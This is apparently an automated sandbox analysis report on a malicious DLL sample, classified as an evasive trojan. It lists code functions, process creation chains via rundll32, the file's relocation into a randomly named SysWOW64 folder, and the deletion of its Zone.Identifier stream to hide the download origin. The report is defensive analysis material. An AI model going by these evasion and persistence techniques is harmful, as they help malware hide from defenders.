Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001A0A	7_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000220A	7_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011C10	7_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E21C	7_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F41F	7_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015220	7_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009E22	7_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D223	7_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000EC27	7_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001F83F	7_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10021A3C	7_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E441	7_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002043	7_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003845	7_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002A46	7_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A048	7_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002654	7_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009A57	7_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001406E	7_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001C76	7_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007283	7_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10020687	7_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014E8A	7_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001748A	7_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CC8D	7_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D091	7_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003C91	7_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000AC95	7_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001AC9B	7_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000FEA0	7_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100178A5	7_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D6A7	7_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100144AA	7_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000DAAE	7_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005AB2	7_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100190BA	7_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100198BD	7_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BEC9	7_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017ED1	7_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100208D1	7_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CCD4	7_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010ADE	7_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001ECE3	7_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001AEEB	7_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A8F0	7_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DEF4	7_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100030F6	7_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003502	7_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002309	7_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001FD10	7_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000251C	7_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005923	7_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006B25	7_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002292B	7_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10020B34	7_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10021343	7_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003345	7_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001F14D	7_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C158	7_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003F5C	7_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011F6B	7_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001056A	7_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001577E	7_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009384	7_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014D8D	7_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004F8E	7_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000758F	7_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000FD91	7_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10021193	7_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B397	7_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D99A	7_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019DA1	7_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012FA2	7_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014BAA	7_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017BB2	7_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B1B5	7_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000BFB6	7_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100225C3	7_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006FC4	7_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A3DF	7_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100055E8	7_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BFE8	7_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100203F1	7_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C5FE	7_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000220A	8_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000441E	8_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10015220	8_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000EC27	8_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001F83F	8_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002043	8_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003845	8_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001748A	8_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000AC95	8_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100178A5	8_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100144AA	8_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10005AB2	8_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10017ED1	8_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100208D1	8_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001ECE3	8_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001DEF4	8_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100030F6	8_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10020B34	8_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10009384	8_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000758F	8_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10012FA2	8_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10014BAA	8_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000BFB6	8_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10006FC4	8_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100055E8	8_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100203F1	8_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000C5FE	8_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004C00	8_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10008C09	8_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10001A0A	8_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011C10	8_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000E21C	8_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000F41F	8_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10009E22	8_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000D223	8_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10021A3C	8_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001E441	8_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002A46	8_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000A048	8_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002654	8_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10009A57	8_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001406E	8_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10001C76	8_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10007283	8_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10020687	8_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10014E8A	8_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000CC8D	8_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001D091	8_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003C91	8_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001AC9B	8_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000FEA0	8_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001D6A7	8_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001CAA8	8_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000DAAE	8_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100190BA	8_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100198BD	8_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001BEC9	8_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001CCD4	8_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10010ADE	8_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001AEEB	8_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001A8F0	8_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003502	8_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002309	8_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001FD10	8_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000251C	8_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10005923	8_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10006B25	8_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002292B	8_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10021343	8_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003345	8_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001F14D	8_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000C158	8_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003F5C	8_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011F6B	8_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001056A	8_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001577E	8_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10014D8D	8_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004F8E	8_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000FD91	8_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10021193	8_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001B397	8_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001D99A	8_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10019DA1	8_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100143B3	8_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10017BB2	8_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001B1B5	8_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100225C3	8_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000A3DF	8_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001BFE8	8_2_1001BFE8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 6F31D020 appears 48 times

Source: qrb6jVwzoe.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qrb6jVwzoe.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winDLL@20/7@0/22

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_10011B54 CreateToolhelp32Snapshot,

8_2_10011B54

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\7ce3e80173264ea19b05306b865eadf9

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: qrb6jVwzoe.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: qrb6jVwzoe.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: qrb6jVwzoe.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: qrb6jVwzoe.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: qrb6jVwzoe.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: qrb6jVwzoe.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: qrb6jVwzoe.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: qrb6jVwzoe.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: qrb6jVwzoe.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: qrb6jVwzoe.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: qrb6jVwzoe.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: qrb6jVwzoe.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: qrb6jVwzoe.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F30C7C9 push esi; retf	3_2_6F30C7D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F30BAD4 push ebx; iretd	3_2_6F30BADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F30AD03 push esi; iretd	3_2_6F30AD14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F30CDEB push esp; ret	3_2_6F30CDEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F305DD9 push eax; ret	3_2_6F305DE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31D066 push ecx; ret	3_2_6F31D079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F309C81 push eax; retf	3_2_6F309C83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F30C7C9 push esi; retf	4_2_6F30C7D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F30BAD4 push ebx; iretd	4_2_6F30BADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F30AD03 push esi; iretd	4_2_6F30AD14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F30CDEB push esp; ret	4_2_6F30CDEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F305DD9 push eax; ret	4_2_6F305DE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31D066 push ecx; ret	4_2_6F31D079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F309C81 push eax; retf	4_2_6F309C83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001229 push eax; retf	4_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10001229 push eax; retf	5_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001229 push eax; retf	6_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001229 push eax; retf	7_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10001229 push eax; retf	8_2_1000129A

Source: qrb6jVwzoe.dll

Static PE information: section name: .flat

Source: qrb6jVwzoe.dll

Static PE information: real checksum: 0x748e8 should be: 0x74470

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Wageozwapqd\lwcebmbtifvqy.ywx:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 1864	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1916	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6648	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F32188A FindFirstFileExW,	3_2_6F32188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F32188A FindFirstFileExW,	4_2_6F32188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011A80 FindFirstFileW,	8_2_10011A80

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: svchost.exe, 00000015.00000002.859882550.0000015DEBE60000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
